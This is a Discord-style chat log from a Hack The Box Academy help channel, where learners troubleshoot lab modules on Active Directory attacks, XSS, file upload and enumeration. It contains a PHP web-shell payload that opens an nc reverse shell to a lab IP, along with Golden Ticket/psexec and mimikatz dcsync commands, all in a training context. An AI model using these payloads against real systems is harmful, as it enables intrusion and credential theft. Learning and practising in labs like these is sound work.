#modules

don't use kali so i couldn't say any major or minor differences
I'll try out the command on pwnbox for peace of mind
i just used it because my friend who is doing the oscp uses it, no particular reason
make sure to turn off the vpn on your system
OSCP basically requires you to use kali for the exam
while yes you can use another OS, they don't provide technical support for other OS, since Kali is their own OS
I'm gonna keep using kali if that's the case, if the cpts wasn't HR friendly in my country i might take the oscp
the exam voucher not the full course
gotta troubleshoot the problem I'm having if that's the case
i mean either way OSCP is gonna cost ya $1700
the voucher is $600 i think my friend told me
i think you're right i can't find anything related
Thank you for your time marciel
you're chasing a unicorn
?
you're chasing a unicorn
#rules no one is selling or buying things here
don't make me tap the sign
i deleted your message the first time
it has 0 to do with https://academy.hackthebox.com
the only thing we're buying is modules
type shi
for those that may have been wondering how i organize things in canvas; this is for the nibbles sections of the Getting Started module
Color Coding
- Green - question
- Blue - Info
- Orange - Potential Vulns
- Yellow - Flags
- Red - exploit vulns/vector and user/root access
- Lime - Leaps in logic
AD Attacks - Domain Trusts: Child to Parent (Linux)
Did the Golden Ticket, exported the .ccache file, and impacket-psexec works fine:
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 172.16.5.5.....
[*] Found writable share ADMIN$
[*] Uploading file CKaNBMZk.exe
[*] Opening SVCManager on 172.16.5.5.....
[*] Creating service GHZv on 172.16.5.5.....
[*] Starting service GHZv.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
But I can't get Netexec to work:
SMB academy-ea-dc01.inlanefreight.local 445 ACADEMY-EA-DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB academy-ea-dc01.inlanefreight.local 445 ACADEMY-EA-DC01 [-] INLANEFREIGHT.LOCAL\ from ccache KDC_ERR_C_PRINCIPAL_UNKNOWN
What am I missing here?
--use-kcache is separate from -k iirc
I mean there's a -k flag in nxc
-k flag is for credentialed auth in Kerberos, not ticket auth.
I'm following its Wiki
it is? I never had to put in credentials when I used it before
Okay, I don't get this:
SMB LOGISTICS.INLANEFREIGHT.LOCAL 445 ACADEMY-EA-DC02 [*] Windows 10 / Server 2019 Build 17763 x64 (name:ACADEMY-EA-DC02) (domain:LOGISTICS.INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB LOGISTICS.INLANEFREIGHT.LOCAL 445 ACADEMY-EA-DC02 [+] LOGISTICS.INLANEFREIGHT.LOCAL\hacker from ccache (Pwn3d!)
➜ ad-enum nxc smb INLANEFREIGHT.LOCAL --use-kcache
SMB INLANEFREIGHT.LOCAL 445 ACADEMY-EA-DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB INLANEFREIGHT.LOCAL 445 ACADEMY-EA-DC01 [-] INLANEFREIGHT.LOCAL\ from ccache KDC_ERR_C_PRINCIPAL_UNKNOWN
Its wiki says:
when using the option -k or --use-kcache, you need to specify the same hostname (FQDN) as the one from the kerberos ticket
But how do I auth to the parent domain?
-k uses kerberos authentication mechanisms which may prompt for credentials if no tickets are available to use
I've tried -k, --use-kcache, and combination of both just for good measure
but yeah weird NXC doesn't work when the same ticket works with psexec
maybe raise the issue on the nxc gh or gitlab whatever they're using now ¯\_(ツ)_/¯
why aren't you supplying a username?
:P you at least need to supply that
in this you specified domain/user@server
but in nxc you just attempted to use the server without telling it the user you're trying to auth as
I don't think so, its wiki uses just the flag:
This one is
Anyway, the issue is with how the ticket is created with the impacket-ticketer
been a minute since i've done it but when it comes up in my cleanup i'll get back to you on it; trying not to pull myself in 20 directions
It appears to be a bug in Netexec that prevents support for trust authentication.
nvm I'm really stupid. I just figured it out. Literally just had to read my question to see what the problem was..
redid my notes a bit decided to mess around on the Getting Started Skill Assessment, found an alt way in without metasploit
a common sentiment around here
that module is above tier0 so avoid spoiling content and potential solutions
Sorry!! Won't happen again
taps the sign
but glad reading comprehension is always a solid issue in the hacking world... it's happened to me a fair few times
"root directory" vs "filesystem root"
or "authenticate to" instead of a direct "ssh, rdp to"
BWS
Bless you
hello
@fathom pendant I would like to ask
Is it that the entrance machine will be closed after 2 days?
yeah the pwnbox lasts 2 days
Yes
The lab has a timer as well it's not the full length of the exam time
I suggest instead of asking on discord consult with support
They do work on weekends
Good
Is that the question here?
ask a question
OK thanks
Anyway gl with your exam
When you hit "start exam" you have exactly 10 days [cpts, cwee, cape] or 7 days [cbbh, cdsa] to complete the exam and submit the report
please don't reveal information about higher tier modules
also the error is evident; you're trying to do this
ls -la cat /file
look carefully for your error
so it is a typo for evidence that I have used the sqli to create the file
as my concern that it is permission denied
either way it's an advanced module; please consider rephrasing your question and redacting screenshots:
Spoilers would be
- anything you had to look for
- anything you had to do specifically to exploit
other than that not sure how to help you since i haven't done this module
taps the sign
It is okay cuz I think it is error from the application itself
¯\_(ツ)_/¯
lmao in all my goofing around on the nmap hard assessment; only triggered the alert 6 times
+/- the alert when i curled the status page
Hey folks. I'm doing the knowledge check in the getting started of the penetration tester path. Its a getsimple target.
I have found the admin hash and am able to login to the box.
I have found a vulnerability with the theme template.
This is where I am stuck. I can confirm remote code execution with <?php system('id'); ?>
I cannot get a remote shell however.
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?> and i'm listening on my attack box with nc -lvnp 9443
When I reload the theme and refresh the site, the page doesn't load. Any hints what I might be missing?
Did you replace 10.10.14.2 with your tun0 address
That's it. I was using the eth0 address. Thank you.
WOW thnx, I used Stat TAB and then Hierarchy and the number of ARP Packets appear. Thnx have a nice day
BTW how can I earn HACKER level on HTB???
New to HTB? Need help getting started? Check out this article for a full introduction to the platform!
Hey Folks, has anyone completed this Job Role Path?
i have a question about the paid courses on HTB academy; are they of better quality than the free ones? The free ones feel like any random tutorial you can just find by using a search engine
I don't know what exactly the free ones are, but from what I saw with the Pentester Job Role Path yes the course is of a very high quality.
free ones cost 10 cubes and reward 10 cubes
it's not like they recycle content but better for the paid content. The reason the paid content is paid is because they are a higher level of understanding of a topic, and thus require more effort to create content for
and very much worth it
Hi all,
Can someone help me with the "Wired Equivalent Privacy (WEP) Attacks" in the "Skills Assessment"? (https://academy.hackthebox.com/module/185/section/1941)
In the last question it states "Connect to the WiFi network using the found key and retrieve the flag from 192.168.1.1". I am able to connect to the wifi, but I don't know how to find the flag at 192.168.1.1. Could someone help me? What am I looking for? How do I find it?
Hello! I'm doing the linux fundamental module and I'm on the user management section and I test the commands they teach on the target machine I did the "sudo cat /etc/shadow" and I got a message on the terminal "htb-student is not in the sudoers file. This incident will be reported." Does it mean I can get banned for this? I literally just copied the exercise? What does this mean?
no you won't get banned
that's a standard linux info message
just means that the user, for this lab, doesn't have sudo permissions
you won't always be able to replicate 100%
sometimes the examples are good for information, but won't be practiced on the lab
Okay, thanks! Got worried for a minute haha.
you won't get banned on academy unless you violate the terms of service
did you try logging in as bonni first? you need to use the name not the IP
Got it, the standard linux info message is scary tho. Newbie like me can think it's HTB machine's own warning message.
yes I did. but the event is not generated..
i mean it is the machine's warning message, technically
so when you attempted with bonni's credentials, you tried against DC1.inlanefreight.local, not the IP of the DC
I tried against the IP of DC1
using the IP generates a different logon failure event, as it falls back on a different auth type
okay... great.. I try this ..
can you explain this more??
@fathom pendant : this error is generated.
i mean it's as simple as that
just use DC1 instead
not the fqdn
i misspoke on that one
instead of going through kerberos authentication (server), it falls back on windows authentication (local)
since you're connecting specifically to an IP and not a named device on the network
(even though they're the same device)
Yes i did..
which is why it can fail faster lol
because it doesn't reach out to the krb server
okay great.. thank you @fathom pendant
can someone help me I'm trying to learn a bit about linux fundamentals and I'm stuck at a question on directories. here's the question: What is the name of the hidden "history" file in the htb-user's home directory? how do i find it
ls --help
one of the options there will help you discover all files, including hidden ones
thx
alternatively man ls
i have in a module that has an ip site and i used the zaproxy to enter it with hud and click on break
when i sent a request with ip=;ls; nothing happens
when i see the response i see only the html code and css
what is the module and section name
Please, if someone has an idea, as I've been at this for many hours now and I'm running low on ideas
Basically the question says what to do. Access the IP with a browser / curl / wget / python / whatever
i used burp for this instead of zap
fix this module pls: https://academy.hackthebox.com/module/51/section/1777
not sure what's broken
Thank you so much!!!! Worked with wget! I tried using curl, but the environment doesn't have internet access and doesn't have curl installed, no browser I could find and xdg-open didn't help either
is wget default on most linux systems?
Nice, I'll take note of that
I thought so too, but it's an unknown command to the machine and when I ssh to the machine it has no internet access, so I can't fetch it (tried, but it's not able to establish an internet connection to get it. Also unable to ping basic stuff like google etc. so felt kinda stuck). I was trying to get a remote desktop working over ssh to try and see if I could in that way get a browser
Hey. I'm at the XSS module on the skills assessment section.
I have a WordPress website with a search bar which reflects search input, I couldn't get a reflected XSS attack through that.
There's also a post comment form, however not only does it pass through POST, but it doesn't cause stored xss since comments don't actually get uploaded.
Any clues?
i'm finding the correct answer on my end
not sure what needs to be corrected without you further explaining what your skill issue is
the search may be a red herring
RDP over SSH? All the targets for the WIFI modules have RDP exposed.
It looks like he's purged the site, maybe it's my problem
?
I see. Yeah I thought about the comments mainly, only thing I got is a call through a specific parameter, but how can I send a malicious link to perform that request when it's a post request?
I see the site like this, I can't continue with the form
you can't post screenshots in this channel without linking your account
the request type doesn't matter
the page loads fine for me, disable adblock or any extensions and refresh the page with ctrl+shift+r
Meaning I can send the parameters with a get request too?
ye
but that really doesn't change how you'd test for the right payload
you just do the multi-form test that one of the sections taught you how to do
and work from there
No yeah, I got a blind injection
work off that
read the question VERY carefully
it's asking for the flag COOKIE
Very cookie.
True, through the browser, but that machine is different from the one the task wants you to ssh to. It is not on the correct network and doesn't have the files that the tasks refer to. To get to them you have to get the vpn file to enter the network and then ssh to the correct machine (which is kind of a hassle)
What are you talking about? You connect to the VPN and then you can RDP to the machine (it even says so above the question).
I did all those modules and did not even use SSH once
just ran through and it works as expected with the right payload
I have a payload, problem is its in a post request.
How did you RDP to the machine? Through the Pwnbox on the site? If so how?
I used my own VM connected to the VPN. Then spawned the target in the section and used xfreerdp /u:wifi /p:wifi /v:<TARGETIP> to access the target. In case you use the pwnbox, you don't need the VPN and can RDP right in.
you're focusing on the wrong thing
the session hijacking portion has all the info you'll need
i didn't make or modify any bits of payload *aside from port
just copy/pasted
why is this happening? I run the same command as mentioned in the module.
Looks like you are running the command in the wrong context. The user does not have the necessary permissions for DCSync
privilege::debug
Ohh I got it @fathom pendant
But whose cookies did it get, I haven't understood that part.
read the webpage
Then what should I do? they gave me only this account
Ahhh.
That's why
Thanks man @fathom pendant
this is why you need to pay attention to the full context; and not just narrow in
You're right
can you run as admin?
(also helps to provide the module and section name)
Ah okay, I've been trying to use their pwnbox (as I'm in the process of setting up an old laptop with linux for future use). Though with pwnbox I still need the vpn as the pwnbox itself is not on the same network as the spawned target
yes it is
the pwnbox absolutely spawns with the same vpn config you selected
that's how it works
I get the message "ssh: connect to host 10.129.231.118 port 22: No route to host". From arp-scan it doesn't appear in the list
Yes I am but still same issue.
Module Name : Windows Attacks & Defense
Section: Golden Ticket
Need some help? Learn how to reach the support team on Academy.
privilege::debug
okay thanks, I did think it was odd that I had to do it in such a convoluted way
How?
I am working on the ExtraSids attack from the AD module and I created a golden ticket but cannot go across domains with Mimikatz like the module says I should be able to. Whenever I run lsadump::dcsync /user:INLANEFREIGHT\lab_adm in mimikatz I get an error
in mimikatz
@fathom pendant
How did you solve the previous section? Re-read that one and you should have the necessary credentials
Man, some of these modules are getting difficult.
You haven't even scraped the hard ones
Since the job role path for the basic exams top out at t2, the advanced at t3
Thank you!
Well it's partially that I'm just getting used to some of these commands.
Hi. I was working on AD Enum and Attacks - Privilege Access. For the MSSQL question. I was not able to ssh to the Linux attack box. I was planning to use mssqlclient. I grabbed the flag, but from the Windows box. Is this the intended way?
I can't ssh to ACADEMY-EA-ATTACK01. It is not accepting the given password.
Hey gang - pulling my hair out at the skills assessment for win lat movement.
Can't connect to the VNC server on backup host. Followed the solution and still can't figure it out.
Any help is appreciated.
Got all my phishing pages set damnn took me years
Hack the box is fake fr never teaching you how to make money smh
cringe asl
How is it fake? We provide the teaching material and environment to learn the skills you need in order to break in to the field of security. The step of making money with that knowledge, that's up to you I'm afraid, but it usually involves looking for open positions of relevance, or working on bounty programs.
We're open to feedback always, but "it's fake"..
he's trolling
he wants to sound edgy or something
i don't think you'll get anything remotely constructive coming out of him tbh
No, neither do I, but if they are expecting HTB to provide knowledge how to make money through unethical means, and respond as such, then we know.
Of course they won't respond like that now, now that I've said that
but I'm assuming as much
lmao
Hey guys, I need some help here. Although it may be a silly question, I actually consider it to be a trick question. It is about the module: introduction to penetration testing.
the question is: which domain of testing is the most fundamental for every penetration tester (format: three words)
but I really consider that cannot be answered with just three words
Anybody know where I can get help with the web fuzzing module??
here, just ask your question
PKI - ESC1
Then we can execute the openssl command mentioned in the output of Certify.
user @htb[/htb]$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
i didn't enter this command, i have an answer like this
could not read private key cert.pem
@brazen knot Try to ask your question without showing content of the module. That said, make sure you perform all the steps. Looks like you didn't set your payload in metasploit. you didn't post how you created the payload so make sure that's correct too.
Hello would anyone be able to help me with this not sure what I'm doing wrong tbh I cannot pull up the website I'm also still new to Cybersecurity.
Navigate to the bottom of this section and click on Click here to spawn the target system!
Now, navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard".
thank you
open vpn
sorry about that, it was because i didn't set the payload on ms, thank u!
Hi Guys has anyone done Advanced XSS and CSRF Exploitation Skills Assessment, i am stuck on that for days, or does anyone know where i can get a hint, Thanks in advance.
what's your question
please refrain from posting content from the module and just ask your question
your error said url not found, try the full url
Alright noted
If i use the full url i don't get a callback from the victim
i'm not sure it matters, but usually people use the exfil server i think
I don't know if i am not supposed to host the payload on my exploit server, i tried hosting on my local http python server, but still not working
I would review your payload, i think it's missing some things like the msg var
Don't have a definitive answer for you, but could be something as simple as the permissions available to the user you're authing as.
What do you recommend for those who are starting out in the world of cybersecurity, I want to study through hack the box.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Thanks!!!!
Hi, sorry for disturbing, any hint?
Is it possible to become a good blue team in the world of hacking/cybersecurity, using the hack the box platform for free?
I'd advise re-reading the module / section content. That is a tier 3 module, and hints, spoilers or other such is not permitted (read the channel subject)
Same to you @rustic sage, please.
There's an amount of blue team content available, I can't say honestly how much, but it's spread across Academy and the Labs IIRC. For free? Not sure about that, depends on prior experience and how you are with using the knowledge available to you I suppose.
But you can at the least get an idea for what the role may entail
Oh okay, thanks!
I thought it is permitted to get little hint when you get stuck on something, there is definitely something i am doing wrong, i have solved all the lab without getting help from anywhere, and on this i have done the difficult part by exploiting the client side open redirect to promote my user, i just need a little help, i thought that's the main reason for this channel.
Right, I'm just saying spoilers etc, not allowed. Someone may give you a nudge, or get you to ask yourself the right questions to get to the answer (which I suppose comes under indirect hints)
Just wanted to clarify about the direct hints and spoilers part
SuperNuts already gave you a bit of a hint also
If you're still uncertain, the best advice I can give is to give the material another read over, see if you missed something
Alright
Hey y'all I'm new here and to Linux. Getting the foundations down with Python and linux in between days of gaming etc. But as I am now over halfway through the linux fundamentals there are so many tools and commands and switches this seems like a ton to commit to memory. would it be worth making written notes or just stick with knowing the -h and man commands for said tools?
i'd strongly suggest making good notes. also writing stuff down helps with memory retention immensely.
you will practise and remember the ones that you used the most often for the ones you use rarely make good notes
Ok cool appreciate the input. I have noticed the deeper I've gotten the more I have gone back and looked at older commands and tools. Even went out to look up other ways of searching for certain files (Not the answers directly).
hi guys i'm trying to upload a file from Windows PowerShell to my kali linux through Raven. PowerShell returns an error
Exception calling "GetResponse" with "0" argument(s): "The underlying connection was closed: The connection was closed unexpectedly."
listen on 0.0.0.0
i still have the same error
do i need to change something in the scripts of raven ? or is there something i'm doing wrong ?
maybe
test with curl locally
i can do the upload from a web browser when i go to the ip
anyone can help me in the File Upload Skill Assessments? im doing the XXE to grab the content of upload.php but only I receive the 500 code
Why are you adding another url?
i'm wondering why i cant make the upload from powershell with raven but it work with the browser
I put it because I saw it in a blog, when I put the script.js if I get the answer in base64 but when I want to enter a folder and see the upload.php file I can never see it.
But isn't script.js publicly accessible?
They give you the example in the module
You're already in the contact directory
Just specify the upload.php
that's a tier 2 module guys
I feel like an idiot, I never thought I would be in the directory, I didn't even try it, I went straight to it without doing it, thank you.
the attack box has separate creds from the windows box
@safe star can I dm u for no spoilers here for the final part of the File Upload ?
yheah
I text u
find / -type f -user root -name '*.conf' -size -28k -size +25k -newermt 2020-03-03
hey, is there something wrong with my command line? I get "permission denied"
Add 2> /dev/null to the end
Whenever you do a recursive search through filesystem root, you need to add that -- otherwise you'll get flooded with errors for one reason or another
Permission denied == you don't have the right user or group privileges to see something i.e. /root/
hmmm I dont know why it didnt work the first time... now it did. thanks!
it did work the first time;
2> is an error redirect
/dev/null is the void of linux
2> /dev/null redirects the errors to the linux void
last question i get the shell and hostname MS.. and it's telling me wrong answer
is it bugged?
no i got a different answer
tf
also don't post spoilers please
my bad ill reset target something prob wrong with vm
i think it spawned a box from a previous module which is weird
where are those? I do not see that being mentioned anywhere
yup i reset the box and its a complete different box idk what happen there lmao
Intro page gives creds, along with any of the linux based sections
hi
I have consistent RDP issues with the Unconstrained Delegation - Computers section of the Kerberos Attacks module. I have had issues connecting from my own personal vm and then using the pwn box. Anyone experiencing the same?
are you on the vpn at the same time you have the pwnbox spawned?
i am, but i can hop off and retry if that messes up anything
that's why. the pwnbox uses the same vpn as your vm. it's gonna cause conflicts with 2 devices competing for the same IP.
use one or the other
kk retrying now..
having same issue i had from my personal box
After shutting down the pwnbox i'd probably restart the target and reconnect to the vpn for good measure then try ~5 mins after respawning the target
im sorry. i wasn't clear. I mean i tried from the pwnbox and got that error. I'm restarting everything though. the target and pwnbox and will try from the pwnbox one more time.. but tbf, this is the same issue last week -- but ended up moving on to another module in its stead
if it continues then i'd try changing regions ie. US -> EU or vice versa
I'm on the same module and section and it is working fine for me
Not gonna lie. HTTP smuggling is making me cry
Just put the http in the bag bro…
just put the request in the bag bro
Did it get intercepted?
What is the FQDN of the host where the last octet ends with "x.x.x.203"? Does anyone know how to solve this? I tried brute force cracking, but got no results. It's so frustrating.
Brute force tools will work
It's on a subdomain of a subdomain, make sure to thoroughly enumerate
Fuckin scam bot
Could you please tell me which tool I should use?
the section gives you a tool to use
¯\_(ツ)_/¯
you can specify a sub.domain.htb
ok, let me try, thanks
i would double check you have all the sub.domains via dig first before trying each out
it will take a few minutes to go through
hi there all! does anyone have issues on sliver-c2, using chisel on their own vm? When I create the extensions, the chisel version states 0.0.0-src and the VM version is 1.10.1. I have tried compiling the .dll's manually and editing the version but this didn't seem to work? Just seeing if anyone else had something similar?
A bit of a weird issue. Tho i'm currently on Attacking Common Applications module on the PRTG section.
The issue is I'm trying to fuzz different passwords for the found username, however after about 50 requests the application almost becomes non-responsive. I've respawned the machine multiple times tho every time after about 50 requests the same issue occurs. Any insights on how to go about this?
I've even tried to fuzz at 1 thread but the same results follow.
Question: Attack the PRTG target and gain remote code execution. Submit the contents of the flag.txt file on the administrator Desktop.
I've found the credentials they were the same from the module (not the default ones, but from the example), however if the same scenario happens in the exam how should one go about it then?
figure it out; you won't have any examples to go off of in the exam
Yep that's what I'm trying to do. Might be a built in protection in the tool as far as I can tell as it takes exactly 50 requests each time to become unresponsive
¯\_(ツ)_/¯
you can always look back at examples during the exam
I moreso meant you don't have an in-exam example, like the modules
Where you can just grab and use
the in exam examples are the modules
Not what I'm meaning at all
What i mean is:
there's no sample credentials you can use or look to
Just hand crafted or otherwise pilfered lists
you mean they expect me to think and gather my own ideas? how dare they
Estimated time shown for each module.
For example if it is 3 days, is it 3 * 24 = 72 hours?
Edit: I think this has been asked earlier. Is it 8 hours?
I have a habit of prolonging completion by going deeper than necessary. I am thinking to complete within the estimate so just a rough measure will also help.
Alright seems like that's the case after 50 incorrect login attempts on the application it delays the response time to 35 seconds:
Source: https://kb.paessler.com/en/topic/25523-what-is-overload-protection
Perhaps when the module was being tested the wordlist in use didn't get to 50 requests hence the nuance was overlooked
35 seconds checks out to be correct as well:
I genuinely recommend ignoring the estimated times, but yes it's 8 hours
Ok so I'm on this question
Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.
I ran the hasher upload_win.txt from command prompt, however the hash i got is still not the correct answer
your upload method might have corrupted the file
awesome
awesome sauce
Hi! I'm doing the Network Enumeration with Nmap module, I'm having an issue with the level "Nmap Scripting Engine", because I found the flag, but when I send it, it says wrong answer, (I know, maybe it is another, but I made all and that's the only answer I found)
if you do echo "<put the flag here>" | md5sum does it match this result?
ac3133022316dc33acba9bcc62709d76
if not then you grabbed the wrong flag
it's on a common port; that's all i'll say
has any of you taken the famous privesc courses by tib3rius? How does the Linux Privesc module stack up against it? I'm going through it (HTB Academy's that is) right now and it feels like a rollercoaster I have to say
No it doesnt match :c Thank you so much!
it should go without saying you replaced the brackets as well with that?
you put echo "HTB{VALUE}" | md5sum
Yes, I did it exactly as it's here
Which module is that?
Oh… wrong chat
What?
Im still trying it, but I only see one answer, can I send you the port and the script for nmap im using where the answer is? (Obviously, in md5sum)
as i said it's a common port; it's not a crazy port
though the script that's run is shown in the example
I did an aggressive scan too, and I only see the same answer :_c
you'll need to do some manual enumeration after getting the script to run
Has anyone done HTTP attacks - skill assessment? I would like to have some direction.
No can attk
i cannot see endgames section in htb labs (i have vip subscription)
I am on a windows machine with admin access and I need to get the ntlm hash for a user but I don't have mimikatz or PowerView, I am stuck on how to do it?
Anyone that can assist with Windows Priv esc module - Pillaging please? Part with Slack. When I refresh the site with saved extracted cookie in the cookie-editor, I get nada. Am I missing something?
edit... I got it, it was me being dumb.. doh!
hello. i wanted to ask this in general chat but i can't send messages there for some reason. i wanted to know if i could buy a hackthebox gift card directly from my paypal balance without connecting a credit card and if i could use said gift card to pay for a student membership (say being able to pay for 6 months membership with $50 gift card)
https://help.hackthebox.com/en/articles/5185500-what-payment-options-are-supported-and-do-you-store-payment-details
It's best to clarify your questions with the support team.
To be able to write in #general read and follow #welcome
Hi, i'm on the sqlmap essentials module and doing the exercises in the Attack Tuning section. Something I am struggling to understand is: when we have to use a custom prefix, how do we know what the prefix should be? do we guess a few? or where do we need to look? this is the subject of question two in the Attack Tuning section
Gg
i think you meant to send that to the #bot-commands channel
And missing the / before identify
we all started somewhere i guess
DM
Any advice
No one knows what prefix will work, you just try.
I usually use payloads all the things cheat sheet for this.
Look at their SQL payloads and make a list of possible prefixes
Ok thx
can somebody give me a hint for the file upload attack skill assessment been banging my head against this for weeks
did you get the upload.php source code?
nope that's what I've been trying, I can't find the upload directory
from what i remember
- i first tried normal image that will succeed, captured the post request for this upload
- fuzzed in burp which content type is allowed which would allow me to leak the upload.php source. Review Limited File Uploads for this step
dm me if needed
I made sure there's no whitespaces or anything within the file
Don't include the hash, the ss of it saying encoding error would have been just fine
figured it out thanks for your help tho
Excuse me! i am doing information gathering web edition
@fathom pendant thanks, how do I know what to include? I remember there was something here
It's a t3 modules so anything you have to discover or find is a spoiler
oh right, i did include the entire thing..
my bad, havent posted here in a while!
ok here we go again..
could anybody help me with the kerberoasting module in active directory & enumeration & attacks?
currently stuck at the kerberoasting from linux part:
Why does everyone have that wallpaper?
Did you copy it correctly?
Or put it in a output file
well its the default wallpaper of xct "Kali clean"
I did it 1:1 like in the module. I exported it with -outputfile too..
Try pwnbox to see if it's your hashcat
Excuse me, i am trying to understand the 3rd question in the skill assessment section in the information gathering web edition
i mean it's assuming i already found ADMIN directory
i didn't but
i tried to bruteforce the dir using gobuster and vhost using gobuster
also i tried to use the finalRecon automated tool
i pretty much tried So many different wordlists
i am still unable to find it
i tried to look if there is a robots.txt file, but i couldn't find any
i tried to crawl but it seems like in the main website, there is nothing to crawl so i need an initial subdomain or a vhost
since this is a custom vhost, it seems like there is no data about it online on whois or
a TLS/SSL certificate
not a transparent log
Doing: Passwords Attacks module, Section: Password Mutations. For the Question there, I used hashcat to create a "mutated" pwd list from the provided one. But ... "bruteforcing" against SSH, seems to take forever. What am I doing wrong? Or what do I not understand of the question? Any hint please?
are you on the vhost?
try a faster service
Ah of course. Silly me. Will try because this is gonna take a week LOL. Thanks for the push in the right direction.
what do you mean exactly?
the section?
no i am not at the vhost section, i am at the skill assessment one
that you need to find the virtual host
according to my understanding, yes, i need to find a vhost or a subdomain
first find the VHOST. Put that in your hosts file and then gobuster dir -u
i am aware
but i tried all available wordlists
the shorter ones
i couldn't find a single vhost
i have the main vhost in the /etc/hosts file
take raft medium. Or try with ferox
did you use the wordlist in the section: subdomains-top1million-110000.txt
Or FFUF even
not the biggest, i did for the 20k one
Always the 110K one for vhosts
It's fast anyway. And a tip: use ffuf for vhost finding.
hmmmmm, i talked once with someone who said, focus on the smaller wordlists
finding = fuzzing
there shouldn't be a difference between ffuf and gobuster in this case tho no? maybe just speed wise?
speed indeed
ffuf is faster
100% ^^
why to use gobuster then? we can fuzz dir and subdomains in ffuf too
not sure tbh
i think they just wanted that for the other module or something
sometimes tools will break so it's good to have a few of them you can use
i mean it was mentioned in the same module but i am just a little more familiar with gobuster now
plus sometimes different tools give different results
gobuster should work for you
well i just tried the bigger list, still failed
i don't know where those are, ferox or raft, in the DNS folder of the seclist, they don't exist
do i just download them online or they exist somewhere in the seclist?
/opt/SecLists/Discovery/DNS/sub.....110000 ...txt
yes that one, is done
did you --append-domain?
hmmmmm not now, let me do it now, i did it before i forgot to add it now
Or /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
ffuf -w ....... -H "Host: FUZZ.domain.com" -u http://domain.com
Something like that.
With gobuster you need to use both --append-domain and --domain DOMAIN
See? ffuf is easier.
yes yes thank you i am aware! in the -u flag, i am supposed to add the port as well since it's not a regular port
right?
yes
did you add the port to ffuf?
unless somehow there is a problem in the /etc/hosts file
don't add the port to the hosts file
i didn't
Eh.. no
the website now is accessible under the correct name
only problem is that i am not finding the vhost when i am enumerating
nor any dir if i did a directory enumeration
using the common.txt wordlist
can you dm the command
Why not just show your command and hosts file
I never use that one
ffuf ftw, also feroxbuster is cool
you could try to put the expected vhost/directory in a txt file use it as a wordlist just to see if your tools are working correctly
to me Ferox is a bit messy. Probably ignorance or personal dislike.
yeah i get where you're coming from. ferox is fun for quick subdomain/directory discovery
Hi
if you really need to dig i prefer ffuf
Can anyone hack
I use Ferox to double check results from ffuf or gobuster, when I don't trust the results.
No, we can't.
Why can't you I can
You can? Great man.
Thx
Why not the subdomains-top1million-110000.txt wordlist?
Hey, I'm kinda stuck in getting started public exploit module. I've visited the webpage and run the only exploit that was listed for the plugin. It produced a loot file. I'm kinda lost at what to do with said file.
I think you're on the wrong server. Be sure to read the #rules
we already said. so I have no idea why not.
Can you provide a picture?
Yeah we seem to be more passionate about solving his module than him
of the loot file?
Output of the exploit running
Alright, take a look at the loot file.
Cool. A backup file as loot is always good.
Look at the last file extension: It's a .txt file
and to double-check, use the file command.
Are these web page folders? I've tried most of them with no success
Did you look at the .txt file you got?
Yes, a list of folders I think
Hey, is this where i can get hints to questions?
Let me quickly look at the module.
For HTB Academy modules, yes.
can you show it in a DM? I cannot start that module as I have another one running.
Okay.. Uhh I feel dumb.. I'm stuck on module/112/section/1067 - host based enumeration/SMB. I can't find the version of the SMB server that's running. After nmapping I get an outcome and I paste it (the question told me to submit the entire banner so I did) and it doesn't work. I have every other question correct..
what was the target file?
Let me look.
thx
what is module 112 btw? Hahaha.
Try using --script banner
Got it. Pasted it in the URL
There's also other enumeration methods for smb
Doing it from vpn gives weird results
Try with pwnbox
It is 2 words and a version number
Stop your vpn when you use pwnbox btw
hi I'm doing the Attacking DNS section of Attacking Common Services module. The only question at the end of the module is Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. The thing is I am using subbrute just like the section describes. I started it up a few minutes ago and it's taking time to complete. I used the exact subbrute command from the section on the target domain name. Do I need to subbrute the target server it gives me? How long should subbrute take? Should I use the -t 50 option to speed it up?
Yes you need to target the server it gives you
Public nameservers won't resolve inlanefreight.htb
I think .htb should be a new TLD
Won't matter anyway
It was a joke.
Since it's hosted on a private network
¯\_(ツ)_/¯
You need to query the machine at hand. So not on the Internet.
?
You provided 0 context for them to want to check dms
Yes
#rules actually
No dming anyone without consent
? I am confused now. Who are you sending DMs to?
"hey can I dm you about the module i was working on earlier"
^ a simple enough Q
Considering context got a bit pushed with mark
What are you on about?
Yeah but ask first is the point
What even is "that" matter?
Instead of being goofy and going
(dont) check dms
The footprinting smb section
There's other ways of enumerating version
I made a new resolver.txt file to replace resolvers.txt and put the target IP address as the only resolver. Now, it's giving me results. Do I need to replace names.txt as well?
granted, it is taking a little time but the results I'm getting are much better
Geez. My mistake. I now see that @nikt47 is actually bestcatever
No
still odd that nmap on pwnbox gives a different result than an up-to-date Kali machine
it's touchy ¯\_(ツ)_/¯
ok should I just wait it out? would using the -t 50 option be appropriate to speed it up?
Just wait it out, and check results as they come in
ok thanks
Must be latest version as I did that module a while ago and I got the right results. And I never use the pwnbox
The names.txt file is large
Some labs are just touchy and weird
Like the one I do now? Hahaha. I am doing something wrong as I am waiting for a correct pwd hit for hours now.
If it's taking hours, you're doing something wrong
Just taking the doubt out lol
Staring at this for long now hahaha
I forget, is this section before or after the mutations section
It is THE mutation one.
If I use the supplied rules file, the pwd list file gets real long
If I use the rules file in the module as codeblock, it is way shorter, but no success hit.
